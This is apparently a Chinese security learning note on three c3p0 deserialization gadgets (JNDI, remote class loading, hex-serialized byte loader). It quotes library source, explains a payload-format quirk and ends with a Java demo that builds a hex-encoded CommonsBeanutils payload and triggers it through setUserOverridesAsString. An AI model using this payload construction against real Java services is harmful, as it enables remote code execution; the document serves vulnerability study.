c3p0的三个gadget的学习

c3p0的三个gadget的学习

目前c3p0有三种方式getshell

  • 加载远程类
  • jndi
  • hex序列化字节加载器

前两个可以放在一起学习,在com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject,可以看到,如果是IndirectlySerialized的实例就会去调用getObject方法

1
2
3
if (o instanceof IndirectlySerialized) {
o = ((IndirectlySerialized)o).getObject();
}

而它的实现类只有一个com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized,我们可以看看

触发jndi

很明显如果contextName不为空,则会触发,这里没必要继续说下去了

加载远程类

接下来是第二个,这也是ysoserial本身集成的一个payload,继续往下看,ReferenceableUtils.referenceToObject,也是很明显通过URLClassloader加载远程类,并且默认初始化了,因此可以直接在静态块里面放入恶意数据

关于writeObject的话,以ysoserial的为例,PoolSource implements ConnectionPoolDataSource, Referenceable,只要不实现序列化接口,并实现getReference方法返回我们的Reference对象即可,也是很简单的

hex序列化字节加载器

这个更多会用到在fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等里面配合使用

当在userOverridesAsString当中设置了序列化数据后,当调用set方法setUpPropertyListeners时就能触发,而这个监听器正好在设置完userOverridesAsString就会调用

可以看到里面对序列化数据的处理

1
2
3
4
5
6
7
8
9
public static Map parseUserOverridesAsString(String userOverridesAsString) throws IOException, ClassNotFoundException {
if (userOverridesAsString != null) {
String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);
byte[] serBytes = ByteUtils.fromHexAscii(hexAscii);
return Collections.unmodifiableMap((Map)SerializableUtils.fromByteArray(serBytes));
} else {
return Collections.EMPTY_MAP;
}
}

最后触发原生反序列化

后面才发现又个地方比较坑,在com.mchange.v2.c3p0.impl.C3P0ImplUtils#parseUserOverridesAsString

1
String hexAscii = userOverridesAsString.substring("HexAsciiSerializedMap".length() + 1, userOverridesAsString.length() - 1);

这里会把最后一位吃了有点恶心,因此构造payload的时候要像这样

1
String payload = "HexAsciiSerializedMap:"+HexString+":";

这里给个demo方便测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import com.govuln.deserialization.CB1;
import com.mchange.v2.c3p0.WrapperConnectionPoolDataSource;
import hudson.remoting.Base64;
import javassist.ClassPool;
import javassist.CtClass;
import org.python.antlr.ast.Str;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashSet;
import java.util.LinkedList;
import java.util.PriorityQueue;

public class Test {

public static byte[] toByteArray(InputStream in) throws IOException {
byte[] classBytes;
classBytes = new byte[in.available()];
in.read(classBytes);
in.close();
return classBytes;
}

public static String bytesToHexString(byte[] bArray, int length) {
StringBuffer sb = new StringBuffer(length);

for(int i = 0; i < length; ++i) {
String sTemp = Integer.toHexString(255 & bArray[i]);
if (sTemp.length() < 2) {
sb.append(0);
}

sb.append(sTemp.toUpperCase());
}
return sb.toString();
}

public static void main(String[] args) throws Exception {

byte[] data = CB1.getPayload();
String HexString = bytesToHexString(data, data.length);
System.out.println(HexString.length());
String payload = "HexAsciiSerializedMap:"+HexString+":";
WrapperConnectionPoolDataSource wrapperConnectionPoolDataSource = new WrapperConnectionPoolDataSource();
wrapperConnectionPoolDataSource.setUserOverridesAsString(payload);


}

}